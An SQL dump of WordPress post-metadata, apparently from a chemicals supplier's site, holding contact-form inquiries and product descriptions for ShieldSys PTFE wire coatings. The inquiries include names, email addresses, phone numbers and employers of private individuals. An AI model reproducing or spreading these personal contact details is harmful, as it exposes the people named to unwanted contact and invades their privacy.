INSERT INTO `wp_postmeta` VALUES (35708, 3981, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35709, 3981, '_field_1', 'Gilles Plamondon'); 
INSERT INTO `wp_postmeta` VALUES (35710, 3981, '_field_10', 'Rambit Informatique'); 
INSERT INTO `wp_postmeta` VALUES (35711, 3981, '_field_2', 'gplamondon@rambit.qc.ca'); 
INSERT INTO `wp_postmeta` VALUES (35712, 3981, '_field_8', '(450) 622-4578'); 
INSERT INTO `wp_postmeta` VALUES (35713, 3981, '_field_3', 'I would be interested to buy around 12 can of MS-260 aerosol.\r\nIs it possible and  what is the price.\r\nThanks\r\nGilles Plamondon'); 
INSERT INTO `wp_postmeta` VALUES (35714, 3981, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35715, 3981, '_sub_id', '3981'); 
INSERT INTO `wp_postmeta` VALUES (35716, 3982, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35717, 3982, '_seq_num', '534'); 
INSERT INTO `wp_postmeta` VALUES (35718, 3982, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35719, 3982, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35720, 3982, '_field_1', 'tarek mzoughi'); 
INSERT INTO `wp_postmeta` VALUES (35721, 3982, '_field_10', 'GE Renewable Energy'); 
INSERT INTO `wp_postmeta` VALUES (35722, 3982, '_field_2', 'tarekmzoughigm@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (35723, 3982, '_field_8', '(438) 502-4358'); 
INSERT INTO `wp_postmeta` VALUES (35724, 3982, '_field_3', 'Dear \r\n\r\nWe are following up on a resin qualification test started many years ago. We were Alstom at that time (now GE) and Bruno Soulières or Carl Messier may have been your contact points. The intent of the test (thermal cycling) was to qualify one of your resin for use in large stator winding stator caps (as filling compound). We would appreciate if you could provide us with detailed information on your resin. We will probably have to order more to restart the qualification process.\r\nWould be you be able to confirm the following:\r\n1.      your resin now already used in large generator as filling compound for stator bar caps? References may help increase thrust in the product.\r\n2.      Was the material tested at 155oC?\r\n3.      Is there now resins that can be used for the same application (filling compound for stator cap, 155oC thermal index, epoxy, cold curing)?\r\n4.      What would be the procurement time if we ordered a small quantity for qualification purpose ?\r\n\r\nWe would like to restart and finalize the qualification in the upcoming month.\r\n\r\nCordially;\r\nBest regards\r\n\r\n-- \r\nTarek Mzoughi\r\nMaster’s student at ETS\r\nSupport for cost out projects Hydro Solutions\r\nIntern at GE Renewable Energy\r\n \r\nwww.gerenewableenergy.com\r\n \r\n5005, Boul. Lapinière\r\nBrossard, QC\r\nJ4Z 0N5'); 
INSERT INTO `wp_postmeta` VALUES (35725, 3982, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35726, 3982, '_sub_id', '3982'); 
INSERT INTO `wp_postmeta` VALUES (35727, 3984, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35728, 3984, '_seq_num', '270'); 
INSERT INTO `wp_postmeta` VALUES (35729, 3984, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35730, 3984, '_field_12', 'Nancy Powers'); 
INSERT INTO `wp_postmeta` VALUES (35731, 3984, '_field_13', 'Delta Faucet Company'); 
INSERT INTO `wp_postmeta` VALUES (35732, 3984, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (35733, 3984, '_field_14', 'nancy.powers@deltafaucet.com'); 
INSERT INTO `wp_postmeta` VALUES (35734, 3984, '_field_15', '(317) 523-4006'); 
INSERT INTO `wp_postmeta` VALUES (35735, 3984, '_field_16', 'I am the R&amp;D &amp; Innovation Program Manager at Delta Faucet Company and would like to set up a call with one of your technical representatives to discuss your durable coatings, specifically Krytox KS 1220.  My company is searching for a durable fingerprint resistant coating and, based upon our research, Krytox KS 1220 might fulfill this need.  Please provide a contact or call me at your convenience to discuss.'); 
INSERT INTO `wp_postmeta` VALUES (35736, 3984, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35737, 3984, '_sub_id', '3984'); 
INSERT INTO `wp_postmeta` VALUES (35738, 3985, '_edit_lock', '1493657714:3'); 
INSERT INTO `wp_postmeta` VALUES (35739, 3985, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (35740, 3986, '_wp_attached_file', '2017/04/shutterstock_355437692.jpg'); 
INSERT INTO `wp_postmeta` VALUES (35741, 3986, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:702;s:4:"file";s:34:"2017/04/shutterstock_355437692.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_355437692-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_355437692-800x562.jpg";s:5:"width";i:800;s:6:"height";i:562;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_355437692-768x539.jpg";s:5:"width";i:768;s:6:"height";i:539;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_355437692-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_355437692-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_355437692-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_355437692-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (35742, 3987, '_wp_attached_file', '2017/04/ShieldSys-815.pdf'); 
INSERT INTO `wp_postmeta` VALUES (35743, 3985, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (35744, 3985, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (35745, 3985, '_thumbnail_id', '3986'); 
INSERT INTO `wp_postmeta` VALUES (35746, 3985, '312_default_editor', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Fluorochemical\r\n\r\nAppearance:………...White Emulsion\r\n\r\nOdor:…………………Slight\r\n\r\nSpecific Gravity:…….1.1 g/mL @ 25°C\r\n\r\nFlash Point…………..None'); 
INSERT INTO `wp_postmeta` VALUES (35747, 3985, '716_default_editor', '<strong>Recommended Application Procedure</strong><strong>:</strong>\r\n<ul>\r\n 	<li>Dipping and Flooding – The easiest and most widely used method.</li>\r\n 	<li>Spraying – Particularly effective in depositing a very thin coating with excellent adhesion. This system can be used with an automated or hand spray gun.</li>\r\n 	<li>Wiping or Brushing – Very effective for coating small amounts of selected areas on a wire or cable.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (35748, 3985, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35749, 3985, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35750, 3985, '318_custom_list_file', 'a:1:{s:32:"9d2cd969ade06b2f4c00003b29da218b";a:3:{s:4:"name";s:13:"ShieldSys 815";s:4:"file";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2017/04/ShieldSys-815.pdf";s:4:"desc";s:34:"Technical Data Sheet_ShieldSys 815";}}'); 
INSERT INTO `wp_postmeta` VALUES (35751, 3985, '317_default_editor', 'Quart, Gallons, Drums, and 275 Gallon Totes'); 
INSERT INTO `wp_postmeta` VALUES (35752, 3985, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35753, 3985, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (35754, 3985, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (35755, 3985, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (35756, 3985, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (35757, 3985, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (35758, 3985, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35759, 3985, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35760, 3985, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (35761, 3985, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35762, 3985, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (35763, 3985, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (35764, 3985, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (35765, 3985, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (35766, 3985, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (35767, 3985, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (35768, 3985, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (35769, 3985, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (35770, 3985, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (35771, 3985, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (35772, 3985, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (35773, 3985, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (35774, 3985, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35775, 3985, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35776, 3985, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (35777, 3985, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (35778, 3985, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (35779, 3985, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (35780, 3985, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35781, 3985, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35782, 3985, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (35783, 3985, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (35784, 3985, '_ywtm_content_tab_description', 'ShieldSys 815 Dryfilm Industrial Coating is a water-based, PTFE coating system providing unmatched utility as a wire and cable lubricant.  Our products generate a thin, dry, and lubricious film on metal wires, insulated wires, and twisted wire in jackets. Our proprietary chemistry yields superior surface adhesion and durability resulting in minimal migration of the lubricant and prolonged application effecitiveness. The unique properties of ShieldSys 815 DryFilm industrial coating makes them ideal for application that require enhanced lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting without the use of standard "wet lubricants" like greases and oils. Our patented PTFE-based formulation is thermally stable and can be used at temperatures up to 300°C (581°F). The polymer is clean non-migrating, chemically inert, and not gummy or oily.\r\n\r\n<strong>Wire Drawing Lubrication Benefits: </strong>\r\n\r\nShieldSys 815 DryFilm Industrial Coating are extremely stable dry lubrication products that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubrication products. One to two die-pass systems are recommended. As a Wire and Cable Lubricant, applicator will observe superior surface adhesion and a dramatic reduction in coefficient of friction.\r\n\r\n<strong>Wire and Cable Coating and Stripping:</strong>\r\n\r\nThe unique properties of our wire and cable lubrication products makes them ideal in coatings that enhance lubricity and antistick properties on conductor or insulated wire and cable. DryFilm lubrication products reduce insulation stripping force and provide nonstick abrasion resistance to twisted wire and lubricity for welding wire, wire forming, and knitting. ShieldSys 815 are used to impart a thin, nonstick film on metal wires or on insulated wire for cable products and twisted wire in jackets.'); 
INSERT INTO `wp_postmeta` VALUES (35785, 3985, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (35786, 3985, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (35787, 3985, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (35788, 3985, '_yoast_wpseo_focuskw_text_input', 'DryFilm Industrial Coating'); 
INSERT INTO `wp_postmeta` VALUES (35789, 3985, '_yoast_wpseo_focuskw', 'DryFilm Industrial Coating'); 
INSERT INTO `wp_postmeta` VALUES (35790, 3985, '_yoast_wpseo_title', 'ShieldSys™ 815 | DryFilm Industrial Coating | Wire and Cable Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (35791, 3985, '_yoast_wpseo_metadesc', 'The unique properties of our Dryfilm Industrial Coating provide enhanced lubrication and anti-stick properties versus standard wire and cable lubricants.'); 
INSERT INTO `wp_postmeta` VALUES (35792, 3985, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (35793, 3985, '_yoast_wpseo_focuskeywords', '[{"keyword":"Wire and Cable Lubricant","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (35794, 3986, '_wp_attachment_image_alt', 'ShieldSys 815'); 
INSERT INTO `wp_postmeta` VALUES (35795, 3985, '_yoast_wpseo_linkdex', '95'); 
INSERT INTO `wp_postmeta` VALUES (35796, 3989, '_edit_lock', '1498491474:3'); 
INSERT INTO `wp_postmeta` VALUES (35797, 3989, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (35799, 1384, '_wp_old_slug', 'ms-555557'); 
INSERT INTO `wp_postmeta` VALUES (35800, 1384, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35801, 1384, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (35802, 1384, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (35803, 1384, '_yoast_wpseo_focuskw_text_input', 'Heavy Duty Solvent'); 
INSERT INTO `wp_postmeta` VALUES (35804, 1384, '_yoast_wpseo_focuskw', 'Heavy Duty Solvent'); 
INSERT INTO `wp_postmeta` VALUES (35805, 1384, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (35806, 1384, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (35807, 3990, '_wp_attached_file', '2017/04/shutterstock_184233572.jpg'); 
INSERT INTO `wp_postmeta` VALUES (35808, 3990, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2017/04/shutterstock_184233572.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_184233572-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_184233572-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_184233572-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_184233572-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_184233572-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_184233572-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_184233572-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (35809, 3990, '_wp_attachment_image_alt', 'DryFilm Industrial Coating'); 
INSERT INTO `wp_postmeta` VALUES (35810, 3989, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (35811, 3989, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (35812, 3989, '_thumbnail_id', '3990'); 
INSERT INTO `wp_postmeta` VALUES (35813, 3989, '312_default_editor', '<strong>Physical Properties:</strong>\r\n\r\nPrimary Polymer:…...Fluorochemical\r\n\r\nAppearance:………...White Emulsion\r\n\r\nOdor:…………………Slight Alcoholic\r\n\r\nSpecific Gravity:…….1.0 g/mL @ 25°C\r\n\r\nFlash Point…………..34 °C'); 
INSERT INTO `wp_postmeta` VALUES (35814, 3989, '716_default_editor', '<strong>Recommended Application Procedure</strong><strong>:</strong>\r\n<ul>\r\n 	<li>Dipping and Flooding – The easiest and most widely used method.</li>\r\n 	<li>Spraying – Particularly effective in depositing a very thin coating with excellent adhesion.</li>\r\n 	<li>Wiping or Brushing – Very effective for coating small amounts of selected areas on a wire or cable.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (35815, 3989, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35816, 3989, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35817, 3989, '317_default_editor', 'Quart, Gallons, Drums, and 275 Gallon Totes'); 
INSERT INTO `wp_postmeta` VALUES (35818, 3989, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (35819, 3989, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (35820, 3989, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (35821, 3989, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (35822, 3989, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (35823, 3989, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (35824, 3989, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35825, 3989, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35826, 3989, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (35827, 3989, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35828, 3989, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (35829, 3989, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (35830, 3989, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (35831, 3989, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (35832, 3989, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (35833, 3989, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (35834, 3989, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (35835, 3989, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (35836, 3989, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (35837, 3989, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (35838, 3989, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (35839, 3989, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (35840, 3989, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35841, 3989, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35842, 3989, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (35843, 3989, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (35844, 3989, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (35845, 3989, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (35846, 3989, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35847, 3989, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (35848, 3989, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (35849, 3989, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (35850, 3989, '_ywtm_content_tab_description', 'ShieldSys 520 DryFilm Industrial Coating is a PTFE wire coating designed to provide unmatched lubricity and anti-stick properties to all wires and cables. ShieldSys 520 wire coating is water and isopropyl alcohol based dispersion.  When applied to to a wire or cable, it exhibits outstanding adhesion, durability, and a very low coefficient of friction. This coating is particular effectively at enabling easy jacket stripping due to its high lubricity and non-stick properties. ShieldSys 520 is proprietary PTFE wire coating formulation providing accelerated drying and cure times relative to ShieldSys 815.\r\n\r\n<strong>Advantages:</strong>\r\n\r\nShieldSys 520 exhibit outstanding lubricity and extremely low coefficient of friction. The patented polymer is thermally stable and can be used at temperatures up to 300°C (572°F). The polymer is clean, non-migrating, chemically inert, and not gummy or oily.\r\n\r\n<strong>Wire Drawing Lubricant:</strong>\r\n\r\nShieldSys 520 PTFE wire coatings are  high performance PTFE dispersions which extremely stable dry lubricants that form a film on the wire surface for drawing. The product can also be used as a pre-coat to enhance the total performance of your drawing lubricant systems. Die wear is minimized, and faster speeds can be obtained.'); 
INSERT INTO `wp_postmeta` VALUES (35851, 3989, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (35852, 3989, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (35853, 3989, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (35854, 3989, '_yoast_wpseo_focuskw_text_input', 'Insulator & Conductor Coating'); 
INSERT INTO `wp_postmeta` VALUES (35855, 3989, '_yoast_wpseo_focuskw', 'Insulator & Conductor Coating'); 
INSERT INTO `wp_postmeta` VALUES (35856, 3989, '_yoast_wpseo_title', 'ShieldSys 520 Insulator & Conductor Coating | PTFE Wire Coating | Wire & Cable'); 
INSERT INTO `wp_postmeta` VALUES (35857, 3989, '_yoast_wpseo_metadesc', 'ShieldSys 520 Insulator & Conductor Coating designed to provide superior anti-stick and lubricity. Ideal for wire, jacketed wire, wire stripping and cable'); 
INSERT INTO `wp_postmeta` VALUES (35858, 3989, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (35859, 3989, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (35860, 3989, '_wp_old_slug', 'ptfe-wire-coatings'); 
INSERT INTO `wp_postmeta` VALUES (35861, 3989, '_yoast_wpseo_linkdex', '92'); 
INSERT INTO `wp_postmeta` VALUES (35862, 3992, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35863, 3992, '_seq_num', '535'); 
INSERT INTO `wp_postmeta` VALUES (35864, 3992, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35865, 3992, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35866, 3992, '_field_1', 'Scarlett Frost'); 
INSERT INTO `wp_postmeta` VALUES (35867, 3992, '_field_10', 'The List Box'); 
INSERT INTO `wp_postmeta` VALUES (35868, 3992, '_field_2', 'scarlett@thelistbox.com'); 
INSERT INTO `wp_postmeta` VALUES (35869, 3992, '_field_8', '7169175269'); 
INSERT INTO `wp_postmeta` VALUES (35870, 3992, '_field_3', 'Hi, \r\n\r\nWould you be interested in discussing about the updated database of Critical Power Industry users?\r\n\r\nWe can provide you contact details of Owners, CEO&#039;s, Facility Managers, C-level Executives, VP level, Engineers and buyers from a multitude of industries requiring critical power solutions.\r\n\r\nIndustries focused: Electric &amp; hybrid vehicles, Utility &amp; Renewable energy , Portable electronics, Medical technology,  Military and Telecommunications.\r\n\r\nIf your target audience is not mentioned above, kindly let me know.\r\n\r\nSend me your target audience and geographical area to understand your needs better so that I can send you few free samples, updated records and further details at no cost for your data evaluation. \r\n\r\nLooking forward to hear from you.\r\n\r\nBest Regards,\r\n\r\nScarlett Frost\r\nMarketing Manager'); 
INSERT INTO `wp_postmeta` VALUES (35871, 3992, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35872, 3992, '_sub_id', '3992'); 
INSERT INTO `wp_postmeta` VALUES (35873, 3993, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35874, 3993, '_seq_num', '536'); 
INSERT INTO `wp_postmeta` VALUES (35875, 3993, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35876, 3993, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35877, 3993, '_field_1', 'Linda Escudero'); 
INSERT INTO `wp_postmeta` VALUES (35878, 3993, '_field_10', 'Pma Sale '); 
INSERT INTO `wp_postmeta` VALUES (35879, 3993, '_field_2', 'lindaescudero@aeropneumatic.com'); 
INSERT INTO `wp_postmeta` VALUES (35880, 3993, '_field_8', '(480) 619-4386'); 
INSERT INTO `wp_postmeta` VALUES (35881, 3993, '_field_3', 'Hello Sales,\ncan you please quote P/N 3M PTFE FILM ELECTRICAL TAPE 60   .250&quot; wide @ Qty: minimal piece price.\nThank you,\nLinda Escudero '); 
INSERT INTO `wp_postmeta` VALUES (35882, 3993, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35883, 3993, '_sub_id', '3993'); 
INSERT INTO `wp_postmeta` VALUES (35884, 3994, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35885, 3994, '_seq_num', '537'); 
INSERT INTO `wp_postmeta` VALUES (35886, 3994, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35887, 3994, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (35888, 3994, '_field_1', 'Corwyn Warwaruk '); 
INSERT INTO `wp_postmeta` VALUES (35889, 3994, '_field_10', 'West of the 4th Weaving '); 
INSERT INTO `wp_postmeta` VALUES (35890, 3994, '_field_2', 'Theweaver@west4thweaving.com'); 
INSERT INTO `wp_postmeta` VALUES (35891, 3994, '_field_8', '(403) 350-2505'); 
INSERT INTO `wp_postmeta` VALUES (35892, 3994, '_field_3', 'I am interested in a clear polyurethane coating for fabric to encase our hand woven fabrics. It has to be clear so you can see the fabric design through the coating. I am interested in a flaxinvoe end product similar to a urethane coated webbing \r\n\r\nThanks\r\n\r\nCorwyn '); 
INSERT INTO `wp_postmeta` VALUES (35893, 3994, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (35894, 3994, '_sub_id', '3994'); 
INSERT INTO `wp_postmeta` VALUES (35895, 3995, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (35896, 3995, '_seq_num', '271'); 
INSERT INTO `wp_postmeta` VALUES (35897, 3995, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (35898, 3995, '_field_12', 'Bhawnesh Bhardwaj'); 
INSERT INTO `wp_postmeta` VALUES (35899, 3995, '_field_13', 'Agastya Aeroworks Pvt Ltd'); 
INSERT INTO `wp_postmeta` VALUES (35900, 3995, '_field_18', 'Indian Defence'); 
INSERT INTO `wp_postmeta` VALUES (35901, 3995, '_field_14', 'bhawneshbhardwaj@agastyaaeroworks.in'); 
INSERT INTO `wp_postmeta` VALUES (35902, 3995, '_field_15', '(917) 503-3509'); 
INSERT INTO `wp_postmeta` VALUES (35903, 3995, '_field_16', 'Hi Sir/Madam, Good day. We require 100 Kg Krytox NRT 8904 grease for usage in Indian defence. Kindly note that OEM certificate would also be required. Kindly arrange to provide your best quote at the earliest.'); 
INSERT INTO `wp_postmeta` VALUES (35904, 3995, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (35905, 3995, '_sub_id', '3995'); 
INSERT INTO `wp_postmeta` VALUES (35906, 3996, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (35907, 3996, '_seq_num', '538'); 
INSERT INTO `wp_postmeta` VALUES (35908, 3996, '_action', 'submit'); 
